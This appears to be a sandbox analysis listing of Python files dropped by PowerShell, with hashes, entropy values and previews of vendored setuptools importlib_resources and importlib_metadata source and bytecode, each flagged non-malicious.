                                                                                                                                                                                                                              Preview:from itertools import filterfalse...def unique_everseen(iterable, key=None):. "List unique elements, preserving order. Remember all elements ever seen.". # unique_everseen('AAAABBBCCDAABBB') --> A B C D. # unique_everseen('ABBCcAD', str.lower) --> A B C D. seen = set(). seen_add = seen.add. if key is None:. for element in filterfalse(seen.__contains__, iterable):. seen_add(element). yield element. else:. for element in iterable:. k = key(element). if k not in seen:. seen_add(k). yield element...# copied from more_itertools 8.8.def always_iterable(obj, base_type=(str, bytes)):. """If *obj* is iterable, return an iterator over its items::.. >>> obj = (1, 2, 3). >>> list(always_iterable(obj)). [1, 2, 3].. If *obj* is not iterable, return a one-item iterable containing *obj*::.. >>> obj = 1. >>> list(always_iterable(obj)). [1].. If
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1165
                                                                                                                                                                                                                              Entropy (8bit):4.589630114144403
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:11xvxDEYB3FGMLehPm6PEtXHCFmw3xNI/Fmw31RI2Fmw3phBMBFmw3qtpVFjrv+3:1O8Hz9t8I/O2GCKmHWYvc0NdFi8t8h3
                                                                                                                                                                                                                              MD5:7B26AA9EB1BEA909E049DD5C61968FAD
                                                                                                                                                                                                                              SHA1:B8C4F7F6F47E8C0ED79A6857BFD2E93301B6BA0B
                                                                                                                                                                                                                              SHA-256:BF97B56431BBC994C7DE1ED38DB4B96CCE69F001B330F54EBBCB240CCBF887A9
                                                                                                                                                                                                                              SHA-512:21CC4A49421F0D23281EC495D70CE5632CDC862245BB4E8F44B4F25CC9B12E7962A666C6B12E6F091A557A6D12DDEFEB26AB37F5E2ECA6907D273BC61101CE61
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from ._compat import Protocol.from typing import Any, Dict, Iterator, List, TypeVar, Union..._T = TypeVar("_T")...class PackageMetadata(Protocol):. def __len__(self) -> int:. ... # pragma: no cover.. def __contains__(self, item: str) -> bool:. ... # pragma: no cover.. def __getitem__(self, key: str) -> str:. ... # pragma: no cover.. def __iter__(self) -> Iterator[str]:. ... # pragma: no cover.. def get_all(self, name: str, failobj: _T = ...) -> Union[List[Any], _T]:. """. Return all values associated with a possibly multi-valued key.. """.. @property. def json(self) -> Dict[str, Union[str, List[str]]]:. """. A JSON-compatible form of the metadata.. """...class SimplePath(Protocol[_T]):. """. A minimal subset of pathlib.Path required by PathDistribution.. """.. def joinpath(self) -> _T:. ... # pragma: no cover.. def __truediv__(self, other: Union[str, _T]) -> _T:.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1098
                                                                                                                                                                                                                              Entropy (8bit):4.73393018729231
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:eT6O6paT54ZY9yg8XEHwy0j7+VO6PgFw71IQMqg:eTScMgWEI8Aqg
                                                                                                                                                                                                                              MD5:887DDD5BB038B14DC7AD72C44FADBF17
                                                                                                                                                                                                                              SHA1:1786AE495A168590FDC4D03BA7FDDF46C7A2CB86
                                                                                                                                                                                                                              SHA-256:D93939B706FF5602C263ED4D100423759A7F4BD385302FA95333F68ACB9A3EC4
                                                                                                                                                                                                                              SHA-512:BF34F37A9E5D3D81DC5C7DBE4A936A069553155BD504A2EDE4CD6DD3E1A19D390F8670637D317EEBF204CF1B5CA2B1FD98D0F4A1670ACADBAC274B32C028C6E2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:""".Compatibility layer with Python 3.8/3.9.""".from typing import TYPE_CHECKING, Any, Optional..if TYPE_CHECKING: # pragma: no cover. # Prevent circular imports on runtime.. from . import Distribution, EntryPoint.else:. Distribution = EntryPoint = Any...def normalized_name(dist: Distribution) -> Optional[str]:. """. Honor name normalization for distributions that don't provide ``_normalized_name``.. """. try:. return dist._normalized_name. except AttributeError:. from . import Prepared # -> delay to prevent circular imports... return Prepared.normalize(getattr(dist, "name", None) or dist.metadata['Name'])...def ep_matches(ep: EntryPoint, **params) -> bool:. """. Workaround for ``EntryPoint`` objects without the ``matches`` method.. """. try:. return ep.matches(**params). except AttributeError:. from . import EntryPoint # -> delay to prevent circular imports... # Reconstruct the EntryPoint object to mak
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2166
                                                                                                                                                                                                                              Entropy (8bit):4.591554908235955
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:euODvbG12wYRzHiUyOrIuxeQc2zGNjwa10Tr19jmqVb1e5b1ZoUE7f7SEED1NzEF:eDrbGowYRzHinOrIAeQc2iuOVim2
                                                                                                                                                                                                                              MD5:8FF71463425CB8C06493B984B5789CB6
                                                                                                                                                                                                                              SHA1:5706A824D57D684B2985EE3A05A77AC152F55EBC
                                                                                                                                                                                                                              SHA-256:1C2B0592C66924B7933F734493F9E0AC079755146D4EBB7287D78E001A113F80
                                                                                                                                                                                                                              SHA-512:813ABF128CA41F4A7D1894386A33275497A5E1C0CDFB1FDC33B2CCF05D6B41EE69245B394789821FF5777F47485651BA19A0604BFBD76ABD8DE0FB50E985CA50
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import re..from ._functools import method_cache...# from jaraco.text 3.5.class FoldedCase(str):. """. A case insensitive string class; behaves just like str. except compares equal when the only variation is case... >>> s = FoldedCase('hello world').. >>> s == 'Hello World'. True.. >>> 'Hello World' == s. True.. >>> s != 'Hello World'. False.. >>> s.index('O'). 4.. >>> s.split('O'). ['hell', ' w', 'rld'].. >>> sorted(map(FoldedCase, ['GAMMA', 'alpha', 'Beta'])). ['alpha', 'Beta', 'GAMMA'].. Sequence membership is straightforward... >>> "Hello World" in [s]. True. >>> s in ["Hello World"]. True.. You may test for set inclusion, but candidate and elements. must both be folded... >>> FoldedCase("Hello World") in {s}. True. >>> s in {FoldedCase("Hello World")}. True.. String inclusion works as long as the FoldedCase object. is on the right... >>> "hello" in FoldedCase("Hello World"). True.. But n
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):506
                                                                                                                                                                                                                              Entropy (8bit):4.341556439303665
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:S6vifsY5VfHf2X4If4n+ZdusqxlRqT9sJdiHsdX1BdhOyc0yq:pvjY3Ifk+Zdv2UTieH2c0B
                                                                                                                                                                                                                              MD5:548187B89C8FF20BCCCAF047B58E5168
                                                                                                                                                                                                                              SHA1:F4E32BDCB8B1C2D2D10A1D3586527393528250C6
                                                                                                                                                                                                                              SHA-256:7AF3E6D7690B818A939BEA5BCE6EB46CEBAE9AE993F08A41356169D2E332AF31
                                                                                                                                                                                                                              SHA-512:D0DE76EE907088CA9698AFB3FA1FA600171761029E50FC5757CE61E74A667C81264B5CEFF05A50E5AC5F8B0B49B7DCC43CC2D15A1756458F552DA55E2AEA6400
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:"""Read resources contained within a package."""..from ._common import (. as_file,. files,. Package,.)..from ._legacy import (. contents,. open_binary,. read_binary,. open_text,. read_text,. is_resource,. path,. Resource,.)..from .abc import ResourceReader...__all__ = [. 'Package',. 'Resource',. 'ResourceReader',. 'as_file',. 'contents',. 'files',. 'is_resource',. 'open_binary',. 'open_text',. 'path',. 'read_binary',. 'read_text',.].
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):660
                                                                                                                                                                                                                              Entropy (8bit):5.179925994737853
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:2CSBOToVYbcjPi6MCxfXhMY4myyxOHt28sWnMKNxVlzWjaYtY3fet:2C90VYGP5M6M5myyxOHA8SKNxfz1aY36
                                                                                                                                                                                                                              MD5:B0E4C2DB2D58709647CE783166920B62
                                                                                                                                                                                                                              SHA1:8BF68C9B28D11E14320284493E339CD36642EBE8
                                                                                                                                                                                                                              SHA-256:1B5A199768D85519E27CC0CF7106400AFEC3DA0E04E5677D4632A0EEFED88B33
                                                                                                                                                                                                                              SHA-512:82AE8BB5A727A48948BAEC6FE72E7518BEF377179057796B3CCF24D76EEC5CABD196F68F2094A56702E512BEC94C358D524A7F0326E7B844B0CCB13613F67237
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf..........................X.....d.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...g.d...Z.y.).z*Read resources contained within a package......)...as_file..files..Package)...contents..open_binary..read_binary..open_text..read_text..is_resource..path..Resource)...ResourceReader).r....r....r....r....r....r....r....r....r....r....r....r....N)...__doc__.._commonr....r....r......_legacyr....r....r....r....r....r....r....r......abcr......__all__........`C:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/importlib_resources/__init__.py..<module>r........s-..........0............................. .......r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9705
                                                                                                                                                                                                                              Entropy (8bit):4.8750356584353725
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:JwOb2TBhiDuJg88Jz2vDC9ECQn8zx5KXX1khYG2SY2RVAp3LNPtIyLRxXIOJBDP1:SAMEDuN8ov6E98zKXSLC+ALPG6X9Jpr5
                                                                                                                                                                                                                              MD5:0AE9C530E163D073C7324E04E46AF8AC
                                                                                                                                                                                                                              SHA1:FA646A4DA9B55650DCCE078ADF802F6B2FCD0EB9
                                                                                                                                                                                                                              SHA-256:ADF72193C58A305352E524FCDBF026F40BE898A3D1346D6BB0FD75DD3D606FD3
                                                                                                                                                                                                                              SHA-512:EDA8432420146D0533BD7EAB09C83A28880F6F0C4262DA95AC68595E37F910CE2CCF7921C725F7B5FE20D4DB899CC0350359CC14AD13741FA692C159605C71B7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf..........................r.....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z...G.d...d.........Z.d.d...Z...G.d...d.........Z.d...Z.y.)......)...suppress)...TextIOWrapper.....)...abcc.....................".....e.Z.d.Z.d.Z.d...f.d...Z.d...Z.y.)...SpecLoaderAdapterz>. Adapt a package spec to adapt the underlying loader.. c...........................|.j...................S...N)...loader....specs.... .aC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/importlib_resources/_adapters.py..<lambda>z.SpecLoaderAdapter.<lambda>....s.......$.+.+.......c.....................,.....|.|._...........|.|.........|._.........y.r....).r....r....)...selfr......adapters.... r......__init__z.SpecLoaderAdapter.__init__....s.................d.m....r....c...........................t.........|.j...................|.........S.r....)...getattrr......r......names.... r......__getattr__z.SpecLoaderAdapter.__getattr__....s..........t.y.y.$..'..'r....N)...__name__..__modul
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8754
                                                                                                                                                                                                                              Entropy (8bit):5.129059651716294
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Vd5+d0TvItslL3RhUzspJWi/RcVEedBJaGSmnubh05BhQbN9VAd2:VP+dhslL3HUzspJWi2WedLaGg9010HAI
                                                                                                                                                                                                                              MD5:C7971F935AA780069DF2A04F38F938AB
                                                                                                                                                                                                                              SHA1:4CDC15C85243E234C1FF69860BA58875C1F86FBF
                                                                                                                                                                                                                              SHA-256:BFDA8FD66943D3DDA2ED95EF15DA943EA09F0F3211CED616C9DF9A79BA3F62AE
                                                                                                                                                                                                                              SHA-512:058EE00397A6AC568A15212C999B3F9A864DEF5A2118B1387A50C7CABA624617441C5B0945521CF7571169BBBBAE3620F82E15E2E86966DC6712AE24E414429A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.VfQ.........................2.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.e.j&..................e.f.....Z.e.Z.d...Z.e.d.d.e.e.....d.e.f.d...........Z.d.e.j&..................d.e.e.....f.d...Z.e.j4..................d.e.e.....d.e.j&..................f.d...........Z.e.j8..................d.e.d.e.j&..................f.d...........Z.e.j8..................d.d.d.e.j&..................f.d...........Z.d...Z.d.e.j&..................f.d...Z.e.j@....................d.e.jB..................d...d...........Z"d...Z#d.e.d.e$f.d...Z%e.j4..................d...........Z&e&j9..................e.jN..........................e.j@..................d...................Z.e.j@..................d.e.jP..................f.d...........Z)e.j@..................d...........Z*d...Z+y.)......N)...Union..Optional..cast.....)...ResourceReader..Traversable)...wrap_specc.....................`.........t...................t.....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5026
                                                                                                                                                                                                                              Entropy (8bit):5.224557486297887
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:h1zfhnyM20r/4wTynP9MrZV8p5cyvnAGG:/dlL4waVoNy4GG
                                                                                                                                                                                                                              MD5:EBB8FF4A5B58498EDA88E69D295D9A0B
                                                                                                                                                                                                                              SHA1:337CB6B40408C6CB5C85208A7DD3D62DFEEA0235
                                                                                                                                                                                                                              SHA-256:53F654615DA3EA8BAD6DEADA453720E0F2DA24FB8041F4992267CE50ECA07643
                                                                                                                                                                                                                              SHA-512:BE7E20504152AC55D2A358A26F27B6046D5BC9C9183067F0C52FD86C6E81F97B9651D0F73DB2B5909F91F619277F5D7B41634311CCBF78A94209BC2E81E2318E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vfm.........................J.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j...................d.k\..r.d.d.l.m.Z...n.d.d.l.m.Z.....d.d.l.m.Z.....d.d.l.m.Z.....G.d...d.........Z.d...Z.e.j...................d.k\..r.e.e.e.j(..................e.....f.....Z.y.e.e.d.f.....Z.y.#.e.$.r...d...Z.Y..Jw.x.Y.w.#.e.$.r...e.j ..................Z.Y..Zw.x.Y.w.)......N)...suppress)...Union)...........)...Path.....)...runtime_checkablec...........................|.S...N..)...clss.... ._C:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/importlib_resources/_compat.pyr....r........s................)...Protocolc.....................,.....e.Z.d.Z.d.Z.d...Z.e.d...........Z.d...Z.y.)...TraversableResourcesLoaderz.. Adapt loaders to provide TraversableResources and other. compatibility... Used primarily for Python 3.9 and earlier where the native. loaders do not yet implement TraversableResources.. c...........................|.|._.........y.r........spec)
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1172
                                                                                                                                                                                                                              Entropy (8bit):5.591790384863375
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:KVR60cYiBi5btVw1G+/V3JgyfPjZlKNxfz/H14t8axgLb84/CBdm5MJ:a4NjiB41G+N3JjfPjZSxL/V48AgkusT
                                                                                                                                                                                                                              MD5:C6FB5C5B7AEF59D96ACA0A9FC633C4B1
                                                                                                                                                                                                                              SHA1:2C6449C1D3021FB2B93CE02671D0C27500A9371A
                                                                                                                                                                                                                              SHA-256:A25E2807783BA7B7E198D38FC896BD6D063FF14333DDF73723D0165448FEADF6
                                                                                                                                                                                                                              SHA-512:2112864D6C8E0E37459F904354FCA1F291B7C0F5896D0A601B978B280A3D714CE7807BFE82992C88D9AECC35E0000FF3BCB70757888564B722E242A4980B8429
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vft..............................d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.........Z...e.d.........Z...d.d.e.e.....d.e.e.e.g.e.f.........d.e.e.....f.d...Z.y.)......)...filterfalse)...Callable..Iterable..Iterator..Optional..Set..TypeVar..Union.._T.._UN..iterable..key..returnc................#........K.....t.................}.|.j...................}.|..(t.........|.j...................|.........D.]...}...|.|...........|...........y.|.D.]...}...|.|.........}.|.|.v.s.....|.|...........|...........y...w.).zHList unique elements, preserving order. Remember all elements ever seen.N)...set..addr......__contains__).r....r......seen..seen_add..element..ks.... .bC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/importlib_resources/_itertools.py..unique_everseenr........ss........... #.u.D....x.x.H....{..".4.#4.#4.h..?......G....W.......M......... ......G....G...A......}..................s.....A.A$....A$.).N)...itertoolsr......typingr....r....r....r....r.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5788
                                                                                                                                                                                                                              Entropy (8bit):5.302950360468695
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:C9nWzimJ9treh/Kl9/wNkmtTCmyTlqTJYjb2yz0l9mJ7NOeLtojqjBfnY2iw:C9nWziq9tqxKl94DtOmttYP249XroAnH
                                                                                                                                                                                                                              MD5:DFF2EC42FE8F72946C1F4EE21F38C90A
                                                                                                                                                                                                                              SHA1:FE42B9AC9B088E3FE207C141439785F1895FE9E9
                                                                                                                                                                                                                              SHA-256:366DCB5BCE7D1C88FE90DBBE0782A51CE758D4DF9807A2E1F402FEF9FF3D8E85
                                                                                                                                                                                                                              SHA-512:42050CBF1246ED8F8F0623DA6CAA5E52AB872CBF860C1337D01A64A95A0E3E0D27AB8669B19A4617709C4E7800196F541B69730141E4379037E007237707A7E2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.e.j...................e.f.....Z.e.Z.d...Z.d.e.d.e.f.d...Z.e.d.e.d.e.d.e.f.d...........Z.e.d.e.d.e.d.e.f.d...........Z.e.....d.d.e.d.e.d.e.d.e.d.e.f.d...........Z.e.....d.d.e.d.e.d.e.d.e.d.e.f.d...........Z.e.d.e.d.e.e.....f.d...........Z.e.d.e.d.e.d.e.f.d...........Z.e.d.e.d.e.d.e.e.j8......................f.d...........Z.y.)......N)...Union..Iterable..ContextManager..BinaryIO..TextIO..Any.....)..._commonc.....................B.......t.........j...............................f.d...........}.|.S.).Nc.....................f.......t.........j.....................j.....................d...t.........d.................|.i.|.....S.).Nz. is deprecated. Use files() instead. Refer to https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy for migration advice......)...stacklevel)...warnings..warn..__name__..DeprecationWarning)...args..kwar
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8870
                                                                                                                                                                                                                              Entropy (8bit):5.126225840297756
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:sf5G/Ah+7ve/RyobPgXr17l1KvDo97AjnJUE/BhaOz8FynzCsI5Jlr1EvWr2P+C7:093LCWDodxmBgFumsibSzmxz824VLl
                                                                                                                                                                                                                              MD5:C2D833C00FDC7F2B0FA3AA0E546D08BA
                                                                                                                                                                                                                              SHA1:3CB9E170B9D8FBAD613DE2ECEB47314497D5C62F
                                                                                                                                                                                                                              SHA-256:ACD8E4827836D738A28A072277128CDA2B83B2FBABC1AEF481680AB2E5E7B4B7
                                                                                                                                                                                                                              SHA-512:D528ED4A9CCC6D86F4B7792893955D56E2514BB7D472BE12FC52545C8CDAF21E5C53AB310491F744A47CB0F7916BB8B054E65179C45D0D1324C1E8A63D3B5944
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf................................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...g.d...Z...G.d...d.e.j"............................Z...G.d...d.e.........Z.e...G.d...d.e.................Z...G.d...d.e.........Z.y.)......N)...Any..BinaryIO..Iterable..Iterator..NoReturn..Text..Optional.....)...runtime_checkable..Protocol..StrPath)...ResourceReader..Traversable..TraversableResourcesc...........................e.Z.d.Z.d.Z.e.j...................d.e.d.e.f.d...........Z.e.j...................d.e.d.e.f.d...........Z.e.j...................d.e.d.e.f.d...........Z.e.j...................d.e.e.....f.d...........Z.y.).r....zDAbstract base class for loaders to provide resource reading support...resource..returnc...........................t...........).z.Return an opened, file-like object for binary reading... The 'resource' argument is expected to represent only a file name.. If the resource cannot be found, FileNotFoundError is raised..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7643
                                                                                                                                                                                                                              Entropy (8bit):4.901028602362718
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:tt9Z6QNztuuJDG+cFvNGcJkRtoPZDguOGqfq:D9ZPNzMuWFYfq
                                                                                                                                                                                                                              MD5:27ADF891908D06A0F7F33C5D5C0E4010
                                                                                                                                                                                                                              SHA1:0B87F3B94450A01575539CB71A826D5878373CDB
                                                                                                                                                                                                                              SHA-256:C0B72B92BE181813ABC41ED0C85A882BFEF6DB4549F710F9F5D775B4DCF8C875
                                                                                                                                                                                                                              SHA-512:5D97E32B978CDB6773242982FF1DA13831A884DBBB2B8B994B2C968C207CC02DCB9982BDA9A487306DF752CD447B263C0E4242245361C72F7CF1B72D882B7951
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf................................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z.y.)......N.....)...abc)...unique_everseen)...ZipPathc.....................R.....t.........t.........j...................j...................|.................S...N)...iter..collections..OrderedDict..fromkeys)...itemss.... ._C:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/importlib_resources/readers.py..remove_duplicatesr........s.............'..'..0..0....7..8..8.....c...........................e.Z.d.Z.d...Z.d...Z.d...Z.y.)...FileReaderc.....................`.....t.........j...................|.j...........................j...................|._.........y.r....)...pathlib..Path..path..parent)...self..loaders.... r......__init__z.FileReader.__init__....s..........L.L........-..4..4....r....c.....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5496
                                                                                                                                                                                                                              Entropy (8bit):4.980138744798047
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:NCf8RhIRS8+/Ja9JLqWSkNI9cjd2bjnGD0xBe4rTGLw9K+:Na8RCA8+xaXLykNIKd2/GAxRuw9K+
                                                                                                                                                                                                                              MD5:142A627DCBDCFE2EFF0B39CB43988415
                                                                                                                                                                                                                              SHA1:C38C0534BB589F5A8C67E55E00816F26F7709C81
                                                                                                                                                                                                                              SHA-256:6C4CC2DCD981607C739C5D8EBBAF3ABDA45B1374C2AEDE775C3C2FC5B3630721
                                                                                                                                                                                                                              SHA-512:8C96457C71ED57C0072AC06155A7A824D36CE5555B8D812BAE612D556E7D20862DF02341AB9A0EE56D0921121696E600B17A033C21E46D4D3986B4A69893536B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.....G.d...d.e.j...........................Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.e.........Z.y.).z+.Interface adapters for low-level readers.......N)...BinaryIO..List.....)...Traversable..TraversableResourcesc...........................e.Z.d.Z.d.Z.e.e.j...................d.e.f.d...................Z.e.j...................d.e.d.....f.d...........Z.e.j...................d.e.e.....f.d...........Z.e.j...................d.e.d.e.f.d...........Z.e.d...........Z.y.)...SimpleReaderzQ. The minimum, low-level interface required from a resource. provider.. ..returnc...........................y.).zP. The name of the package for which this reader loads resources.. N......selfs.... .^C:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/importlib_resources/simple.py..packagez.SimpleReader.package................c...........................y.).zo.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4504
                                                                                                                                                                                                                              Entropy (8bit):4.292645103351121
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:UX4SMhT04k5lYF0v7P66qU6hSq3dmEP0j4k9CiOAOcjBMqw:xSMh8TYF0vVqWqvP0B9CHAOOMqw
                                                                                                                                                                                                                              MD5:AA3C6D5DAF94F3D647F8235D963C9F6E
                                                                                                                                                                                                                              SHA1:BECFB581B4BB6D0FD839FDF102F41F0D3E636E51
                                                                                                                                                                                                                              SHA-256:A39D6D3F686956DA213F7DE0498C809063692DF60306AC7162C69DCA24598B51
                                                                                                                                                                                                                              SHA-512:08042DC823A902BB75C801F98737CBD0986650FFA2BF32989082E7FEB62CDCB8960535585478BDF4D6D811371B7137FD4BE2B99F5AFB2B523F96CD2C335385F8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from contextlib import suppress.from io import TextIOWrapper..from . import abc...class SpecLoaderAdapter:. """. Adapt a package spec to adapt the underlying loader.. """.. def __init__(self, spec, adapter=lambda spec: spec.loader):. self.spec = spec. self.loader = adapter(spec).. def __getattr__(self, name):. return getattr(self.spec, name)...class TraversableResourcesLoader:. """. Adapt a loader to provide TraversableResources.. """.. def __init__(self, spec):. self.spec = spec.. def get_resource_reader(self, name):. return CompatibilityFiles(self.spec)._native()...def _io_wrapper(file, mode='r', *args, **kwargs):. if mode == 'r':. return TextIOWrapper(file, *args, **kwargs). elif mode == 'rb':. return file. raise ValueError(. "Invalid mode value '{}', only 'r' and 'rb' are supported".format(mode). )...class CompatibilityFiles:. """. Adapter for an existing or non-existent resource
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5457
                                                                                                                                                                                                                              Entropy (8bit):4.598979281858158
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:T4C+eJRkZS7RxZzyjarnZerSUGjjQOkqXq27cyuyIm1t5RITzcIRMzVyfPG:pySR/sarnZmSUGjjmqX7PuyIm1vR4zvG
                                                                                                                                                                                                                              MD5:86DB2877A2BCC11A61D9B8905F19E5FA
                                                                                                                                                                                                                              SHA1:57E3C1B630C9A2DC942F9C21C2EF10AA7CE9B435
                                                                                                                                                                                                                              SHA-256:8D20B8C5F2DD70C35BB5B587B69CDB16435AD16EE4BDFFFF9EC627D780BF0045
                                                                                                                                                                                                                              SHA-512:0632140BE820E91F9FC911BCC15DB5A99AD07B2FE2A0C86017AE38CB1C8FE48767BF5FD53FDF342B1A1DAAC38F4B52F324B52A15508694CD3ECD3D9D3290B682
                                                                                                                                                                                                                              Malicious:false
